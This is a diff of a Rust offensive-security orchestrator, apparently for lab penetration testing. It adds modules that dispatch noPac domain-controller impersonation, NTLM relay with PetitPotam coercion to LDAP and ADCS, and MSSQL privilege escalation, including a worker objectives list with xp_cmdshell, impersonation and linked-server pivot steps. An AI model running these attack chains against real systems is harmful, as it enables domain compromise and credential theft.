state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "192.168.58.30", json!({})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } + + #[tokio::test] + async fn collect_skips_empty_target_ip() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_prefers_domain_matching_credential() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_no_domain_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("admin", "fabrikam.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_falls_back_to_first_cred_when_domain_empty() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produce_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 2); + let ips: std::collections::HashSet<&str> = + work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains("192.168.58.22")); + assert!(ips.contains("192.168.58.23")); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "MSSQL_ACCESS", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "CONTOSO.LOCAL")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "sa"); + } + + #[tokio::test] + async fn collect_partial_dedup_only_skips_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "mssql_access", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_listener_propagated_to_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[tokio::test] + async fn collect_mixed_vuln_types_only_mssql_access() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v2".into(), + make_vuln( + "v2", + "constrained_delegation", + "192.168.58.23", + json!({"target_ip": "192.168.58.23"}), + ), + ); + state.discovered_vulnerabilities.insert( + "v3".into(), + make_vuln( + "v3", + "mssql_impersonation", + "192.168.58.24", + json!({"target_ip": "192.168.58.24"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[tokio::test] + async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } +} diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs index 8c2ab558..75a41efe 100644 --- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs @@ -21,7 +21,7 @@ use tracing::{debug, info, warn}; use crate::orchestrator::dispatcher::Dispatcher; /// Dedup key prefix for MSSQL deep exploitation. -const DEDUP_MSSQL_DEEP: &str = "mssql_deep"; +pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep"; /// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation. /// Interval: 30s. @@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation( .to_string(); // Find a credential for MSSQL access. - // Prefer creds for the target domain, fall back to any cred. - let credential = state + // When the target domain is known, prefer a credential from + // that domain (cross-forest NTLM auth otherwise falls through + // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on + // fabrikam.local SQLEXPRESS). + // + // For `mssql_linked_server` vulns, fall back to a trusted-domain + // credential when no same-domain cred exists: the link hop + // executes via stored login mapping on the remote side, so + // any cred that authenticates to the source server is fine + // (e.g., a north cred lands on castelblack, then EXEC AT + // [BRAAVOS] runs as essos\sql_svc via the stored mapping). + let same_domain = state .credentials .iter() .find(|c| { @@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation( && (domain.is_empty() || c.domain.to_lowercase() == domain.to_lowercase()) }) - .or_else(|| { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - }) .cloned(); + let credential = same_domain.or_else(|| { + if domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + } else { + state.find_trust_credential(&domain) + } + }); if credential.is_none() { debug!( @@ -142,9 +160,17 @@ pub async fn auto_mssql_exploitation( "objectives": [ "Enable xp_cmdshell and execute whoami to confirm code execution", "Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin", + "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'", + "For each impersonatable login, try EXECUTE AS LOGIN = '' and check IS_SRVROLEMEMBER('sysadmin')", + "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'", + "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation", + "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1", "Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)", "Check for SeImpersonatePrivilege for potato escalation", - "Enumerate linked servers for lateral movement", + "Enumerate linked servers and test RPC execution on each link", + "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1", + "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)", + "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`", ], }); @@ -192,7 +218,7 @@ struct MssqlDeepWork { /// MSSQL exploitation (follow-up on confirmed MSSQL access). pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool { let vtype = vuln_type.to_lowercase(); - vtype == "mssql_access" || vtype == "mssql_linked_server" + vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation" } /// Extract the target IP from vulnerability details, with fallbacks. @@ -227,11 +253,12 @@ mod tests { assert!(is_mssql_deep_candidate("MSSQL_ACCESS")); assert!(is_mssql_deep_candidate("mssql_linked_server")); assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER")); + assert!(is_mssql_deep_candidate("mssql_impersonation")); + assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION")); } #[test] fn is_mssql_deep_candidate_negative() { - assert!(!is_mssql_deep_candidate("mssql_impersonation")); assert!(!is_mssql_deep_candidate("rbcd")); assert!(!is_mssql_deep_candidate("esc1")); assert!(!is_mssql_deep_candidate("")); diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs new file mode 100644 index 00000000..dac662c2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/nopac.rs @@ -0,0 +1,384 @@ +//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName +//! spoofing) when conditions are met. +//! +//! noPac creates a computer account, renames it to match a DC, requests a TGT, +//! then restores the name. The TGT now impersonates the DC, enabling DCSync. +//! Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs. +//! +//! The worker has a `nopac` tool that wraps the full chain. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect noPac work items from state (pure logic, no async). +fn collect_nopac_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip domains we already dominate -- noPac is pointless if we have krbtgt + if state.dominated_domains.contains(&domain.to_lowercase()) { + continue; + } + + // Find a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + { + Some(c) => c.clone(), + None => continue, + }; + + let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + if state.is_processed(DEDUP_NOPAC, &dedup_key) { + continue; + } + + items.push(NopacWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Monitors for noPac exploitation opportunities. +/// Dispatches against each DC+credential pair once. +/// Interval: 45s (low-priority CVE check). +pub async fn auto_nopac(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("nopac") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_nopac_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "nopac", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("nopac"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "noPac (CVE-2021-42287) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NOPAC, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "noPac task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac"); + } + } + } + } +} + +struct NopacWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10"); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!( + "nopac:{}:{}", + "CONTOSO.LOCAL".to_lowercase(), + "192.168.58.10" + ); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NOPAC, "nopac"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "nopac", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "nopac"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = NopacWork { + dedup_key: "nopac:contoso.local:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn dedup_key_case_normalization() { + let domain = "CONTOSO.LOCAL"; + let dc_ip = "192.168.58.10"; + let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + + let domain2 = "Fabrikam.Local"; + let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20"); + assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20"); + } + + // --- collect_nopac_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn collect_skips_dominated_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.dominated_domains.insert("contoso.local".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_no_matching_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential for different domain, noPac requires exact domain match + state.credentials.push(make_cred("admin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn domain_matching_for_credential_selection() { + let cred_contoso = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let cred_fabrikam = ares_core::models::Credential { + id: "c2".into(), + username: "fabadmin".into(), + password: "FabPass!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [cred_contoso, cred_fabrikam]; + let target_domain = "fabrikam.local"; + + let matched = creds + .iter() + .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase()); + assert!(matched.is_some()); + assert_eq!(matched.unwrap().username, "fabadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs new file mode 100644 index 00000000..75e57b1b --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs @@ -0,0 +1,850 @@ +//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met. +//! +//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion +//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches +//! relay attacks when: +//! +//! 1. SMB signing is disabled on a target (relay destination) +//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target) +//! 3. We have credentials to trigger coercion or a known coercion source +//! +//! The worker agent coordinates ntlmrelayx + coercion within a single task. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dedup key prefix for relay attacks. +const DEDUP_SET: &str = DEDUP_NTLM_RELAY; + +/// Monitors for NTLM relay opportunities and dispatches relay attacks. +/// Interval: 30s. +pub async fn auto_ntlm_relay(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlm_relay") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_relay_work(&state, &listener) + }; + + for item in work { + let payload = match &item.relay_type { + RelayType::SmbToLdap => json!({ + "technique": "ntlm_relay_ldap", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + RelayType::Esc8 { ca_name, domain } => json!({ + "technique": "ntlm_relay_adcs", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "ca_name": ca_name, + "domain": domain, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + }; + + let priority = dispatcher.effective_priority("ntlm_relay"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + relay_target = %item.relay_target, + relay_type = %item.relay_type, + "NTLM relay attack dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SET, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay"); + } + } + } + } +} + +/// Collect relay work items from current state. +/// +/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_relay_work( + state: &crate::orchestrator::state::StateInner, + listener: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let target_ip = vuln + .details + .get("target_ip") + .or_else(|| vuln.details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if target_ip.is_empty() { + continue; + } + + let relay_key = format!("smb_relay:{target_ip}"); + if state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::SmbToLdap, + relay_target: target_ip.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + // Path 2: Relay to ADCS web enrollment (ESC8) + for vuln in state.discovered_vulnerabilities.values() { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "esc8" && vtype != "adcs_web_enrollment" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let ca_host = vuln + .details + .get("ca_host") + .or_else(|| vuln.details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if ca_host.is_empty() { + continue; + } + + let relay_key = format!("esc8_relay:{ca_host}"); + if state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + let ca_name = vuln + .details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::Esc8 { ca_name, domain }, + relay_target: ca_host.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug). +/// +/// Takes the domain_controllers map and a closure to check dedup state, +/// keeping us decoupled from `StateInner`'s module visibility. +fn find_coercion_source( + domain_controllers: &std::collections::HashMap, + is_processed: impl Fn(&str) -> bool, +) -> Option { + // Prefer a DC we haven't already coerced + domain_controllers + .values() + .find(|ip| !is_processed(ip)) + .or_else(|| domain_controllers.values().next()) + .cloned() +} + +struct RelayWork { + dedup_key: String, + relay_type: RelayType, + relay_target: String, + coercion_source: Option, + listener: String, + credential: ares_core::models::Credential, +} + +enum RelayType { + SmbToLdap, + Esc8 { ca_name: String, domain: String }, +} + +impl std::fmt::Display for RelayType { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + Self::SmbToLdap => write!(f, "smb_to_ldap"), + Self::Esc8 { .. } => write!(f, "esc8_adcs"), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashMap; + + #[test] + fn relay_type_display() { + assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap"); + assert_eq!( + RelayType::Esc8 { + ca_name: "CA".into(), + domain: "contoso.local".into() + } + .to_string(), + "esc8_adcs" + ); + } + + #[test] + fn dedup_key_format_smb() { + let key = format!("smb_relay:{}", "192.168.58.22"); + assert_eq!(key, "smb_relay:192.168.58.22"); + } + + #[test] + fn dedup_key_format_esc8() { + let key = format!("esc8_relay:{}", "192.168.58.10"); + assert_eq!(key, "esc8_relay:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SET, "ntlm_relay"); + } + + #[test] + fn find_coercion_source_prefers_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + // First DC already processed, second not + let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10"); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.20"); + } + + #[test] + fn find_coercion_source_falls_back_to_any() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + + // All processed, still returns one + let result = find_coercion_source(&dcs, |_| true); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.10"); + } + + #[test] + fn find_coercion_source_empty_map() { + let dcs = HashMap::new(); + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_none()); + } + + #[test] + fn esc8_vuln_type_matching() { + let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "esc8" || vtype == "adcs_web_enrollment", + "{t} should match" + ); + } + } + + #[test] + fn smb_signing_vuln_type_matching() { + let vtype = "smb_signing_disabled".to_lowercase(); + assert_eq!(vtype, "smb_signing_disabled"); + + let not_smb = "mssql_access".to_lowercase(); + assert_ne!(not_smb, "smb_signing_disabled"); + } + + #[test] + fn relay_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RelayWork { + dedup_key: "smb_relay:192.168.58.22".into(), + relay_type: RelayType::SmbToLdap, + relay_target: "192.168.58.22".into(), + coercion_source: Some("192.168.58.10".into()), + listener: "192.168.58.100".into(), + credential: cred.clone(), + }; + assert_eq!(work.relay_target, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + assert_eq!(work.credential.username, "admin"); + } + 